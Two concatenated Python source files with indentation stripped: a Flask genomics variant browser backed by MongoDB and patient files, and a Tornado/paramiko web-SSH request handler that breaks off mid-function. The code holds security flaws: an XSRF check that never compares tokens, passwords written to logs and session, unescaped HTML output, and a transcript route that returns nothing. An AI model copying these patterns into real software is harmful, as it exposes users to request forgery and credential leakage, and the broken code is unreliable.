@requires_auth
def exomiser_page(path):
#is this user authorized to see this patient?
return send_from_directory('Exomiser', path)
@app.route('/example/')
@requires_auth
def example():
return send_from_directory('templates', 'temp-plot.html')
@app.route('/transcript2/<transcript_id>')
def transcript_page2(transcript_id):
db = get_db()
try:
transcript = lookups.get_transcript(db, transcript_id)
cache_key = 't-transcript-{}'.format(transcript_id)
t = cache.get(cache_key)
print 'Rendering %stranscript: %s' % ('' if t is None else 'cached ', transcript_id)
if t is None:
gene = lookups.get_gene(db, transcript['gene_id'])
gene['transcripts'] = lookups.get_transcripts_in_gene(db, transcript['gene_id'])
variants_in_transcript = lookups.get_variants_in_transcript(db, transcript_id)
coverage_stats = lookups.get_coverage_for_transcript(db, transcript['xstart'] - EXON_PADDING, transcript['xstop'] + EXON_PADDING)
add_transcript_coordinate_to_variants(db, variants_in_transcript, transcript_id)
t = render_template(
'transcript.html',
transcript=transcript,
transcript_json=json.dumps(transcript),
variants_in_transcript=variants_in_transcript,
variants_in_transcript_json=json.dumps(variants_in_transcript),
coverage_stats=coverage_stats,
coverage_stats_json=json.dumps(coverage_stats),
gene=gene,
gene_json=json.dumps(gene),
csq_order=csq_order,
)
cache.set(cache_key, t)
return t
except Exception, e:
print 'Failed on transcript:', transcript_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/transcript/<transcript_id>')
def transcript_page(transcript_id):
db = get_db()
transcript = lookups.get_transcript(db, transcript_id)
cache_key = 't-transcript-{}'.format(transcript_id)
t = cache.get(cache_key)
print 'Rendering %stranscript: %s' % ('' if t is None else 'cached ', transcript_id)
if t: return t
variants=[v for v in db.variants.find({'Transcript':str(transcript_id)})]
    genes=list(set([v['Gene'] for v in variants]))
print(genes)
cache.set(cache_key, t)
return t
@app.route('/region/<region_id>')
def region_page(region_id):
db = get_db()
try:
region = region_id.split('-')
cache_key = 't-region-{}'.format(region_id)
t = cache.get(cache_key)
print 'Rendering %sregion: %s' % ('' if t is None else 'cached ', region_id)
if t is None:
chrom = region[0]
start = None
stop = None
if len(region) == 3:
chrom, start, stop = region
start = int(start)
stop = int(stop)
if start is None or stop - start > REGION_LIMIT or stop < start:
return render_template(
'region.html',
genes_in_region=None,
variants_in_region=None,
chrom=chrom,
start=start,
stop=stop,
coverage=None,
csq_order=csq_order,
)
if start == stop:
start -= 20
stop += 20
genes_in_region = lookups.get_genes_in_region(db, chrom, start, stop)
variants_in_region = lookups.get_variants_in_region(db, chrom, start, stop)
xstart = get_xpos(chrom, start)
xstop = get_xpos(chrom, stop)
coverage_array = lookups.get_coverage_for_bases(db, xstart, xstop)
t = render_template(
'region.html',
genes_in_region=genes_in_region,
variants_in_region=variants_in_region,
chrom=chrom,
start=start,
stop=stop,
coverage=coverage_array,
csq_order=csq_order,
)
cache.set(cache_key, t)
return t
except Exception, e:
print 'Failed on region:', region_id, ';Error=', traceback.format_exc()
abort(404)
@app.route('/dbsnp/<rsid>')
def dbsnp_page(rsid):
db = get_db()
try:
variants = lookups.get_variants_by_rsid(db, rsid)
chrom = None
start = None
stop = None
print 'Rendering rsid: %s' % rsid
return render_template(
'region.html',
rsid=rsid,
variants_in_region=variants,
chrom=chrom,
start=start,
stop=stop,
coverage=None,
genes_in_region=None,
csq_order=csq_order,
)
except Exception, e:
print 'Failed on rsid:', rsid, ';Error=', traceback.format_exc()
abort(404)
@app.route('/not_found/<query>')
def not_found_page(query):
return render_template(
'not_found.html',
query=query
)
@app.route('/error/<query>')
@app.errorhandler(404)
def error_page(query):
return render_template(
'error.html',
query=query
)
@app.route('/downloads')
def downloads_page():
return render_template('downloads.html')
@app.route('/about')
def about_page():
return render_template('about.html')
@app.route('/participants')
def participants_page():
return render_template('about.html')
@app.route('/terms')
def terms_page():
return render_template('terms.html')
@app.route('/contact')
def contact_page():
return render_template('contact.html')
@app.route('/faq')
def faq_page():
return render_template('faq.html')
@app.route('/samples')
def samples_page():
samples=pandas.read_csv('/slms/UGI/vm_exports/vyp/phenotips/HPO/hpo.txt')
return render_template('samples.html',samples=samples.to_html(escape=False))
@app.route('/text')
def text_page():
db = get_db()
query = request.args.get('text')
datatype, identifier = lookups.get_awesomebar_result(db, query)
if datatype in ['gene', 'transcript']:
gene = lookups.get_gene(db, identifier)
link = "http://genome.ucsc.edu/cgi-bin/hgTracks?db=hg19&position=chr%(chrom)s%%3A%(start)s-%(stop)s" % gene
output = '''Searched for %s. Found %s.
%s; Canonical: %s.
%s''' % (query, identifier, gene['full_gene_name'], gene['canonical_transcript'], link)
output += '' if 'omim_accession' not in gene else '''
In OMIM: %(omim_description)s
http://omim.org/entry/%(omim_accession)s''' % gene
return output
elif datatype == 'error' or datatype == 'not_found':
return "Gene/transcript %s not found" % query
else:
return "Search types other than gene transcript not yet supported"
@app.route('/read_viz/<path:path>')
def read_viz_files(path):
full_path = os.path.abspath(os.path.join(app.config["READ_VIZ_DIR"], path))
    # security check - only files under READ_VIZ_DIR should be accessible
if not full_path.startswith(app.config["READ_VIZ_DIR"]):
return "Invalid path: %s" % path
logging.info("path: " + full_path)
# handle igv.js Range header which it uses to request a subset of a .bam
range_header = request.headers.get('Range', None)
if not range_header:
return send_from_directory(app.config["READ_VIZ_DIR"], path)
m = re.search('(\d+)-(\d*)', range_header)
if not m:
error_msg = "ERROR: unexpected range header syntax: %s" % range_header
logging.error(error_msg)
return error_msg
size = os.path.getsize(full_path)
offset = int(m.group(1))
length = int(m.group(2) or size) - offset
data = None
with open(full_path, 'rb') as f:
f.seek(offset)
data = f.read(length)
rv = Response(data, 206, mimetype="application/octet-stream", direct_passthrough=True)
rv.headers.add('Content-Range', 'bytes {0}-{1}/{2}'.format(offset, offset + length - 1, size))
logging.info("GET range request: %s-%s %s" % (m.group(1), m.group(2), full_path))
return rv
@app.after_request
def apply_caching(response):
# prevent click-jacking vulnerability identified by BITs
response.headers["X-Frame-Options"] = "SAMEORIGIN"
return response
### all the mongodb reading/writing code
def load_db():
"""
Load the database
"""
# Initialize database
# Don't need to explicitly create tables with mongo, just indices
confirm = raw_input('This will drop the database and reload. Are you sure you want to continue? [no] ')
if not confirm.startswith('y'):
print('Exiting...')
sys.exit(1)
all_procs = []
for load_function in [load_variants_file, load_dbsnp_file, load_base_coverage, load_gene_models, load_constraint_information]:
procs = load_function()
all_procs.extend(procs)
print("Started %s processes to run %s" % (len(procs), load_function.__name__))
[p.join() for p in all_procs]
print('Done! Loading MNPs...')
load_mnps()
print('Done! Creating cache...')
#create_cache()
print('Done!')
def load_base_coverage():
""" """
def load_coverage(coverage_files, i, n, db):
coverage_generator = parse_tabix_file_subset(coverage_files, i, n, get_base_coverage_from_file)
try:
db.base_coverage.insert(coverage_generator, w=0)
except pymongo.errors.InvalidOperation, e:
print(e)
# handle error when coverage_generator is empty
pass
db = get_db()
db.base_coverage.drop()
print("Dropped db.base_coverage")
# load coverage first; variant info will depend on coverage
db.base_coverage.ensure_index('xpos')
procs = []
coverage_files = app.config['BASE_COVERAGE_FILES']
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
random.shuffle(app.config['BASE_COVERAGE_FILES'])
for i in range(num_procs):
p = Process(target=load_coverage, args=(coverage_files, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading coverage. Took %s seconds' % int(time.time() - start_time)
def load_variants_file():
def load_variants(sites_file, i, n, db):
for f in sites_file:
print(f)
variants_generator = parse_tabix_file_subset([f], i, n, get_variants_from_sites_vcf)
try:
db.variants.insert(variants_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when variant_generator is empty
db = get_db('exac')
db.variants.drop()
print("Dropped db.variants")
# grab variants from sites VCF
db.variants.ensure_index('xpos')
db.variants.ensure_index('xstart')
db.variants.ensure_index('xstop')
db.variants.ensure_index('rsid')
db.variants.ensure_index('genes')
db.variants.ensure_index('transcripts')
db.variants.ensure_index('variant_id')
#sites_vcfs = app.config['SITES_VCFS']
sites_vcfs=['/slms/UGI/vm_exports/vyp/phenotips/ExAC/0.3.1/ExAC.r0.3.1.sites.vep.vcf.gz']
print(sites_vcfs)
#if len(sites_vcfs) > 1: raise Exception("More than one sites vcf file found: %s" % sites_vcfs)
procs = []
num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
#pdb.set_trace()
for i in range(num_procs):
p = Process(target=load_variants, args=(sites_vcfs, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading variants. Took %s seconds' % int(time.time() - start_time)
def load_constraint_information():
db = get_db()
db.constraint.drop()
print 'Dropped db.constraint.'
start_time = time.time()
with gzip.open(app.config['CONSTRAINT_FILE']) as constraint_file:
for transcript in get_constraint_information(constraint_file):
db.constraint.insert(transcript, w=0)
db.constraint.ensure_index('transcript')
print 'Done loading constraint info. Took %s seconds' % int(time.time() - start_time)
def load_mnps():
db = get_db()
start_time = time.time()
db.variants.ensure_index('has_mnp')
print 'Done indexing.'
while db.variants.find_and_modify({'has_mnp' : True}, {'$unset': {'has_mnp': '', 'mnps': ''}}): pass
print 'Deleted MNP data.'
with gzip.open(app.config['MNP_FILE']) as mnp_file:
for mnp in get_mnp_data(mnp_file):
variant = lookups.get_raw_variant(db, mnp['xpos'], mnp['ref'], mnp['alt'], True)
db.variants.find_and_modify({'_id': variant['_id']}, {'$set': {'has_mnp': True}, '$push': {'mnps': mnp}}, w=0)
db.variants.ensure_index('has_mnp')
print 'Done loading MNP info. Took %s seconds' % int(time.time() - start_time)
def load_gene_models():
db = get_db()
db.genes.drop()
db.transcripts.drop()
db.exons.drop()
print 'Dropped db.genes, db.transcripts, and db.exons.'
start_time = time.time()
canonical_transcripts = {}
with gzip.open(app.config['CANONICAL_TRANSCRIPT_FILE']) as canonical_transcript_file:
for gene, transcript in get_canonical_transcripts(canonical_transcript_file):
canonical_transcripts[gene] = transcript
omim_annotations = {}
with gzip.open(app.config['OMIM_FILE']) as omim_file:
for fields in get_omim_associations(omim_file):
if fields is None:
continue
gene, transcript, accession, description = fields
omim_annotations[gene] = (accession, description)
dbnsfp_info = {}
with gzip.open(app.config['DBNSFP_FILE']) as dbnsfp_file:
for dbnsfp_gene in get_dbnsfp_info(dbnsfp_file):
other_names = [other_name.upper() for other_name in dbnsfp_gene['gene_other_names']]
dbnsfp_info[dbnsfp_gene['ensembl_gene']] = (dbnsfp_gene['gene_full_name'], other_names)
print 'Done loading metadata. Took %s seconds' % int(time.time() - start_time)
# grab genes from GTF
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
for gene in get_genes_from_gencode_gtf(gtf_file):
gene_id = gene['gene_id']
if gene_id in canonical_transcripts:
gene['canonical_transcript'] = canonical_transcripts[gene_id]
if gene_id in omim_annotations:
gene['omim_accession'] = omim_annotations[gene_id][0]
gene['omim_description'] = omim_annotations[gene_id][1]
if gene_id in dbnsfp_info:
gene['full_gene_name'] = dbnsfp_info[gene_id][0]
gene['other_names'] = dbnsfp_info[gene_id][1]
db.genes.insert(gene, w=0)
print 'Done loading genes. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.genes.ensure_index('gene_id')
db.genes.ensure_index('gene_name_upper')
db.genes.ensure_index('gene_name')
db.genes.ensure_index('other_names')
db.genes.ensure_index('xstart')
db.genes.ensure_index('xstop')
print 'Done indexing gene table. Took %s seconds' % int(time.time() - start_time)
# and now transcripts
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.transcripts.insert((transcript for transcript in get_transcripts_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading transcripts. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.transcripts.ensure_index('transcript_id')
db.transcripts.ensure_index('gene_id')
print 'Done indexing transcript table. Took %s seconds' % int(time.time() - start_time)
# Building up gene definitions
start_time = time.time()
with gzip.open(app.config['GENCODE_GTF']) as gtf_file:
db.exons.insert((exon for exon in get_exons_from_gencode_gtf(gtf_file)), w=0)
print 'Done loading exons. Took %s seconds' % int(time.time() - start_time)
start_time = time.time()
db.exons.ensure_index('exon_id')
db.exons.ensure_index('transcript_id')
db.exons.ensure_index('gene_id')
print 'Done indexing exon table. Took %s seconds' % int(time.time() - start_time)
return []
def load_dbsnp_file():
db = get_db()
def load_dbsnp(dbsnp_file, i, n, db):
if os.path.isfile(dbsnp_file + ".tbi"):
dbsnp_record_generator = parse_tabix_file_subset([dbsnp_file], i, n, get_snp_from_dbsnp_file)
try:
db.dbsnp.insert(dbsnp_record_generator, w=0)
except pymongo.errors.InvalidOperation:
pass # handle error when coverage_generator is empty
else:
with gzip.open(dbsnp_file) as f:
db.dbsnp.insert((snp for snp in get_snp_from_dbsnp_file(f)), w=0)
db.dbsnp.drop()
db.dbsnp.ensure_index('rsid')
db.dbsnp.ensure_index('xpos')
start_time = time.time()
dbsnp_file = app.config['DBSNP_FILE']
print "Loading dbsnp from %s" % dbsnp_file
if os.path.isfile(dbsnp_file + ".tbi"): num_procs = app.config['LOAD_DB_PARALLEL_PROCESSES']
else:
# see if non-tabixed .gz version exists
if os.path.isfile(dbsnp_file):
print(("WARNING: %(dbsnp_file)s.tbi index file not found. Will use single thread to load dbsnp."
"To create a tabix-indexed dbsnp file based on UCSC dbsnp, do: \n"
" wget http://hgdownload.soe.ucsc.edu/goldenPath/hg19/database/snp141.txt.gz \n"
" gzcat snp141.txt.gz | cut -f 1-5 | bgzip -c > snp141.txt.bgz \n"
" tabix -0 -s 2 -b 3 -e 4 snp141.txt.bgz") % locals())
num_procs = 1
else:
raise Exception("dbsnp file %s(dbsnp_file)s not found." % locals())
procs = []
for i in range(num_procs):
p = Process(target=load_dbsnp, args=(dbsnp_file, i, num_procs, db))
p.start()
procs.append(p)
return procs
#print 'Done loading dbSNP. Took %s seconds' % int(time.time() - start_time)
#start_time = time.time()
#db.dbsnp.ensure_index('rsid')
#print 'Done indexing dbSNP table. Took %s seconds' % int(time.time() - start_time)
"""
Get the most recent common ancestor between two sets of hpo terms.
"""
def mrc_hpo():
hpo_graph=get_hpo_graph()
db=get_db()
for var in db.variants.find():
hpo_anc=[]
for eid in list(set(var['HET']+var['HOM'])):
patient=db.patients.find_one({'external_id':eid})
if not patient: continue
if 'features' not in patient: continue
for f in patient['features']:
fid=f['id']
if not fid.startswith('HP'): continue
hpo_anc.append(set(hpo_graph.get_ancestors(fid)))
if not hpo_anc: continue
if 'SYMBOL' not in var: continue
var['ALL_HPO']=list(set(set.union(*hpo_anc)))
var['SHARED_HPO']=list(set.intersection(*hpo_anc))
print(var['VARIANT_ID'],var['SYMBOL'],len(var['HET']+var['HOM']),var['SHARED_HPO'],var['ALL_HPO'])
db.variants.update({'VARIANT_ID':var['VARIANT_ID']},var,upsert=True)
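# Illustrative sketch of the set algebra mrc_hpo() stores per variant
# (the HPO ids and the two-carrier example are illustrative only):
#
#   hpo_anc = [{'HP:0000001', 'HP:0000478'},   # ancestors of carrier 1's terms
#              {'HP:0000001', 'HP:0000707'}]   # ancestors of carrier 2's terms
#   ALL_HPO    = set.union(*hpo_anc)           # {'HP:0000001', 'HP:0000478', 'HP:0000707'}
#   SHARED_HPO = set.intersection(*hpo_anc)    # {'HP:0000001'}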
#progressbar
'''
{
'random_p_id':{
'total':456,
'count':123,
'status':['running','done']
},
...
}
'''
PROGRESS_BAR = {}
'''
initiate a progress instance
arg: total length of genes
return: progress_id
'''
def init_progress_bar(id,length):
# check id
if id in PROGRESS_BAR:
if PROGRESS_BAR[id]['status'] != 'done':
return 'the id already exists in PROGRESS_BAR'
# initialise progress_bar
PROGRESS_BAR[id] = {
'total': length,
'count':0,
'message': '',
'status':'running'
}
return 0
'''
update progress
arg: {
id: id,
message: message,
step: 1
}
default step 1
'''
def update_progress_bar(obj):
# check if id in PROGRESS_BAR
if not obj['id'] in PROGRESS_BAR:
return 'ID does not exist in PROGRESS_BAR'
# update progress
if not 'step' in obj:
obj['step'] = 1
PROGRESS_BAR[obj['id']]['count'] += obj['step']
PROGRESS_BAR[obj['id']]['message'] = obj['message']
# done?
if PROGRESS_BAR[obj['id']]['count'] == PROGRESS_BAR[obj['id']]['total']:
PROGRESS_BAR[obj['id']]['status'] = 'done'
'''
kill a progress
'''
def kill_progress_bar(key):
if key in PROGRESS_BAR:
del PROGRESS_BAR[key]
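# Sketch of the intended lifecycle of the helpers above (the job id, length
# and message are made-up values, not taken from real requests):
#
#   init_progress_bar('job-123', 100)                      # returns 0 on success
#   update_progress_bar({'id': 'job-123', 'message': 'working', 'step': 1})
#   PROGRESS_BAR['job-123']['count']                       # -> 1
#   kill_progress_bar('job-123')                           # drop the entry when done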
'''
to check if an iterable is empty
'''
def peek(iterable):
try:
first = next(iterable)
except RuntimeError:
return None
except StopIteration:
return None
return first, itertools.chain([first], iterable)
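# Usage sketch: peek() returns None for an exhausted iterator, otherwise the
# first element together with an equivalent iterator.
#
#   peek(iter([]))                 # -> None
#   first, rest = peek(iter([1]))  # first == 1, list(rest) == [1]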
'''
find the freaking PID, Title or Abstract no matter what!
'''
def find_item(obj, key):
if key in obj:
return obj[key]
if isinstance(obj, dict):
for k in obj:
if isinstance(obj[k], dict):
item = find_item(obj[k], key)
if item is not None:
return item
elif isinstance(obj[k], list):
for i in obj[k]:
if isinstance(i, str):
continue
item = find_item(i, key)
if item is not None:
return item
elif isinstance(obj, list):
for k in obj:
if isinstance(k, dict):
item = find_item(k, key)
if item is not None:
return item
elif isinstance(k, list):
for i in k:
if isinstance(i, str):
continue
item = find_item(i, key)
if item is not None:
return item
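# Sketch of find_item() on a nested, PubMed-like record (the structure below
# is made up; real Entrez records are deeper):
#
#   rec = {'MedlineCitation': {'PMID': '12345',
#                              'Article': {'ArticleTitle': 'A title'}}}
#   find_item(rec, 'PMID')          # -> '12345'
#   find_item(rec, 'ArticleTitle')  # -> 'A title'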
"""
for pubmedBatch
check whether title and abstract are truly relevant. Assign to both this gene and each ref
"""
def scrutinise(obj):
print obj['smashed_all']
if obj['lag']:
obj['lag'] = obj['lag']/3600/24 # convert it to days
# need to update
search_results = Entrez.read(Entrez.esearch(db='pubmed', term=obj['smashed_all'], reldate=obj['lag'], datetype='pdat', usehistory='y'))
else:
# just search
search_results = Entrez.read(Entrez.esearch(db='pubmed',retmax=50, term=obj['smashed_all'], usehistory='y'))
# now done the search. let's get results
count = int(search_results["Count"])
print count
results = {'results':[], 'total_score':0}
# get search content
attempt = 1
while attempt <= 10:
try:
handle = Entrez.efetch("pubmed",
                                   retstart=0,
retmax=50,
retmode="xml",
webenv=search_results['WebEnv'],
query_key=search_results['QueryKey']
)
break
except HTTPError as err:
if 500 <= err.code <= 599:
print('Received error from server %s' % err)
else:
print('Something is wrong while efetch..')
print('Attempt %i of 10' % attempt)
attempt += 1
time.sleep(5)
record = Entrez.parse(handle)
if peek(record):
# got something. let's do some calculation
for r in record:
# calculate score
score = 0
pid = str(find_item(r, 'PMID'))
abstract_list = find_item(r, 'AbstractText')
# parse abstract
abstract = ''
if abstract_list:
for a in abstract_list:
if hasattr(a, 'attributes') and 'Label' in a.attributes:
abstract = abstract + '<b>' + a.attributes['Label'] + ': </b>'
abstract = abstract + a + '<br/>'
else:
abstract = abstract + a
title = find_item(r, 'ArticleTitle')
if title:
score = score + len(obj['reg'].findall(title))
if abstract:
score = score + len(obj['reg'].findall(abstract))
# add result to genes[gene_name]
if score:
results['results'].append({
'id': pid,
'title': title,
'abstract': abstract,
'score': score
})
results['total_score'] = results['total_score'] + score
results['results'] = sorted(results['results'], key=lambda k: k['score'], reverse=True)
return results
def get_pred_score(obj):
# for the batch_pubmed route.
# calculate the pred score
# [D/A].each = 10, [P].each = 5, [C].each = 6, [T/B/N].each = -1. If there is a splicing/insertion/deletion event, the score is set as 1000. Not given is set as 0
# ref: https://github.com/plagnollab/DNASeq_pipeline/blob/master/GATK_v2/filtering.md
pred = 0
if ('Func' in obj and re.search('splic', obj['Func'])) or ('ExonicFunc' in obj and re.search(r'stop|frame|del|insert', obj['ExonicFunc'])):
        pred = 1000
else:
for k in obj:
if re.search('Pred', k):
if obj[k] == 'D' or obj[k] == 'A':
pred = pred + 10
elif obj[k] == 'P':
pred = pred + 5
elif obj[k] == 'C':
pred = pred + 6
elif obj[k] == 'T' or obj[k] == 'B' or obj[k] == 'N':
pred = pred - 1
else:
pass
    return pred
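# Worked example of the scoring above (a hypothetical annotation dict whose
# keys merely need to contain 'Pred', as the loop checks):
#
#   get_pred_score({'SIFT_Pred': 'D', 'Polyphen2_Pred': 'P', 'LRT_Pred': 'B'})
#   # -> 10 + 5 - 1 = 14
#   get_pred_score({'Func': 'splicing', 'SIFT_Pred': 'T'})
#   # -> 1000 (splicing/indel events short-circuit the per-predictor sum)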
@app.route('/plot/<gene>')
def plot(gene):
#db = get_db()
#var=db.variants.find_one({'VARIANT_ID':'3_8775295_C_T'})
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
x=[i for i, r, in enumerate(d)]
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
y=[-math.log10(float(r['HCM.chisq.p'])) for r in d]
print(x)
print(y)
d=csv.DictReader(file('/slms/UGI/vm_exports/vyp/phenotips/CARDIO/assoc_3.csv','r'),delimiter=',')
#layout = dict( yaxis = dict( type = 'log', tickvals = [ 1.5, 2.53, 5.99999 ]), xaxis = dict( ticktext = [ "green eggs", "& ham", "H2O", "Gorgonzola" ], tickvals = [ 0, 1, 2, 3, 4, 5 ]))
labels=[r['VARIANT_ID'] for r in d]
layout = Layout( xaxis = dict( ticktext=labels, tickvals=x ), title="p-value plot" )
#Layout( title="p-value plot")
plotly.offline.plot({
"data": [
Scatter(
x=x,
y=y
)
],
"layout": layout
}, filename='genes/%s-pvalues.html' % (gene,), auto_open=False)
return send_from_directory('genes', '%s-pvalues.html' % gene,)
""" JINJA2 filer """
def highlight(text, list, myclass):
# wrap list element in text (case insensitive) with <span>
# note that gene description has to be split by ','
# with class to do highlighting
for l in list:
# remove (.*), escape +?.*
l = re.sub(r'\(.*\)', '', l)
l = re.sub(r'\+','\\+',l)
l = re.sub(r'\?','\\?',l)
l = re.sub(r'\.','\\.',l)
l = re.sub(r'\*','\\*',l)
l = re.sub(r'\[.*\]','',l)
l = re.sub(r'\\', '\\\\',l)
words = l.split(',')
for w in words:
# wrap w with brackets to be a catch group
text = re.sub(r'(\b%s\b)' % w, r'<span class="%s">\1</span>' % myclass, text, flags=re.I)
return text
jinja2.filters.FILTERS['highlight'] = highlight
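# Template usage sketch for the filter registered above (the gene symbol and
# sentence are illustrative):
#
#   {{ 'Mutations in ABCA4 were reported'|highlight(['ABCA4'], 'hl') }}
#   {# renders: Mutations in <span class="hl">ABCA4</span> were reported #}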
def highlight2(text, kw, myclass):
# wrap list element in text (case insensitive) with <span>
# note that gene description has to be split by ','
# with class to do highlighting
# remove (.*), escape +?.*
for w in kw:
# wrap w with brackets to be a catch group
text = re.sub(r'(%s)'%w, r'<span class="%s">\1</span>' % myclass, text, flags=re.I)
return text
jinja2.filters.FILTERS['highlight2'] = highlight2
@app.route('/load_individual/<individual>')
@requires_auth
def load_individual(individual):
patient = get_db().patients.find_one({'external_id':individual})
if 'rare_variants' in patient and type(patient['rare_variants']) is list:
referrer=request.referrer
if referrer:
u = urlparse(referrer)
referrer='%s://%s' % (u.scheme,u.hostname,)
if u.port: referrer='%s:%s' % (referrer,u.port,)
else:
referrer=''
url=referrer+'/individual/'+individual
print(url)
return redirect(url)
filename='/slms/UGI/vm_exports/vyp/phenotips/DROPBOX/rare_variants/%s.csv' % individual
if not os.path.isfile(filename): return '%s not found!' % filename
auth='%s:%s' % (session['user'],session['password2'],)
p = Process(target=load_patient, args=(filename,auth))
p.start()
return 'Loading %s...' % individual
import views.uclex_gene
import views.uclex_irdc
import views.gene
import views.variant
import views.individual
import views.pubmedbatch
import views.igv
|
handler.py
|
import io
import json
import logging
import socket
import struct
import threading
import traceback
import weakref
import paramiko
import tornado.web
import requests
import sys
from tornado.ioloop import IOLoop
from tornado.util import basestring_type
from webssh.worker import Worker, recycle_worker, workers
from tornado.web import HTTPError
from tornado.options import options
from webssh.policy import user_auth, jwt_encode, authenticated
from webssh.conf import cmdb_api, cmdb_headers
from webssh.conf import delay as DELAY
try:
from concurrent.futures import Future
except ImportError:
from tornado.concurrent import Future
try:
from json.decoder import JSONDecodeError
except ImportError:
JSONDecodeError = ValueError
def parse_encoding(data):
for line in data.split('\n'):
s = line.split('=')[-1]
if s:
return s.strip('"').split('.')[-1]
class MixinHandler(object):
def get_real_client_addr(self):
ip = self.request.headers.get('X-Real-Ip')
port = self.request.headers.get('X-Real-Port')
if ip is None and port is None:
return
try:
port = int(port)
except (TypeError, ValueError):
pass
else:
if ip: # does not validate ip and port here
return (ip, port)
logging.warning('Bad nginx configuration.')
return False
class MixinRequestHandler(tornado.web.RequestHandler):
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", options.allow_origin)
self.set_header("Access-Control-Allow-Headers", options.allow_headers)
self.set_header("Access-Control-Allow-Methods", "POST, GET, OPTIONS")
self.set_header("Request-Id", self.settings['request_id'])
def check_xsrf_cookie(self):
token = (self.get_argument("_xsrf", None) or
self.request.headers.get("X-Xsrftoken") or
self.request.headers.get("X-Csrftoken"))
if not token:
raise HTTPError(403, "'_xsrf' argument missing from POST")
_, token, _ = self._decode_xsrf_token(token)
_, expected_token, _ = self._get_raw_xsrf_token()
if not token:
raise HTTPError(403, "'_xsrf' argument has invalid format")
def is_ajax(self):
if "application/json" in self.request.headers._as_list["Content-Type"][0]:
return True
return False
def _request_summary(self):
return "[{0}] [{1}] [{2}] [request-id:{3}]".format(
self.request.method, self.request.uri,
self.request.remote_ip, self.settings['request_id']
)
class IndexHandler(MixinHandler, MixinRequestHandler):
def initialize(self, loop, policy, host_keys_settings):
self.loop = loop
self.policy = policy
self.host_keys_settings = host_keys_settings
def get_argument(self, name, default=object, strip=True):
"""Returns the value of the argument with the given name.
If default is not provided, the argument is considered to be
required, and we raise a `MissingArgumentError` if it is missing.
If the argument appears in the url more than once, we return the
last value.
The returned value is always unicode.
"""
if hasattr(self.request, "body_json"):
return self.request.body_json[name]
return self._get_argument(name, default, self.request.arguments, strip)
def get_privatekey(self):
try:
data = self.request.files.get('privatekey')[0]['body']
return data.decode('utf-8')
except Exception:
data = None
if not data:
try:
data = self.request.body_json["privatekey"]
if sys.version_info > (2,):
return data
except Exception:
return
@classmethod
def get_specific_pkey(cls, pkeycls, privatekey, password):
logging.info('Trying {0}'.format(pkeycls.__name__,))
try:
pkey = pkeycls.from_private_key(io.StringIO(privatekey),
password=password)
except paramiko.PasswordRequiredException:
raise ValueError('Need password to decrypt the private key.')
except paramiko.SSHException:
pass
else:
return pkey
@classmethod
def get_pkey_obj(cls, privatekey, password):
password = password.encode('utf-8') if password else None
pkey = cls.get_specific_pkey(paramiko.RSAKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.DSSKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.ECDSAKey, privatekey, password)\
or cls.get_specific_pkey(paramiko.Ed25519Key, privatekey,
password)
if not pkey:
raise ValueError('Not a valid private key file or '
'wrong password for decrypting the private key')
return pkey
def get_port(self):
value = self.get_value('port')
try:
port = int(value)
except ValueError:
port = 0
if 0 < port < 65536:
return port
raise ValueError('Invalid port {0}, Request-ID:{1}'.format(value, self.settings['request_id']))
def get_value(self, name):
value = self.get_argument(name)
if not value:
            raise ValueError('Empty {0}, Request-ID: {1}'.format(name, self.settings['request_id']))
return value
def get_args(self):
hostname = self.get_value('hostname')
port = self.get_port()
username = self.get_value('username')
password = self.get_argument('password')
privatekey = self.get_privatekey()
pkey = self.get_pkey_obj(privatekey, password) if privatekey else None
if pkey:
args = (hostname, port, username, password, pkey)
else:
args = (hostname, port, username, password)
logging.info('host info: {0}, Request-ID: {1}'.format(args, self.settings['request_id']))
return args
def get_client_addr(self):
return self.get_real_client_addr() or self.request.connection.stream.\
socket.getpeername()
def get_default_encoding(self, ssh):
try:
_, stdout, _ = ssh.exec_command('locale')
except paramiko.SSHException:
result = None
else:
data = stdout.read().decode()
result = parse_encoding(data)
return result if result else 'utf-8'
def ssh_connect(self):
ssh = paramiko.SSHClient()
ssh._system_host_keys = self.host_keys_settings['system_host_keys']
ssh._host_keys = self.host_keys_settings['host_keys']
ssh._host_keys_filename = self.host_keys_settings['host_keys_filename']
ssh.set_missing_host_key_policy(self.policy)
if self.is_ajax():
try:
self.get_host_info()
except Exception as e:
raise ValueError('for cmdb get host error: {0}, Request-ID: {1}'.format(e, self.settings['request_id']))
args = self.get_args()
dst_addr = (args[0], args[1])
logging.info('Connecting to {}:{}, Request-ID: {}'.format(dst_addr[0], dst_addr[1], self.settings['request_id']))
try:
ssh.connect(*args, timeout=6)
except socket.error:
raise ValueError('Unable to connect to {}:{}, Request-ID: {}'.format(dst_addr[0], dst_addr[1], self.settings['request_id']))
except paramiko.BadAuthenticationType:
raise ValueError('SSH authentication failed. Request-ID: {}'.format(self.settings['request_id']))
except paramiko.BadHostKeyException:
raise ValueError('Bad host key. Request-ID: {}'.format(self.settings['request_id']))
chan = ssh.invoke_shell(term='xterm')
chan.setblocking(0)
worker = Worker(self.loop, ssh, chan, dst_addr)
worker.src_addr = self.get_client_addr()
worker.encoding = self.get_default_encoding(ssh)
return worker
def ssh_connect_wrapped(self, future):
try:
worker = self.ssh_connect()
except Exception as exc:
logging.error(traceback.format_exc())
future.set_exception(exc)
else:
future.set_result(worker)
def options(self, *args, **kwargs):
self.write('success')
def get(self):
self.render('index.html')
# def is_ajax(self):
# if "application/json" in self.request.headers._as_list["Content-Type"][0]:
# return True
# return False
def get_host_info(self):
"""
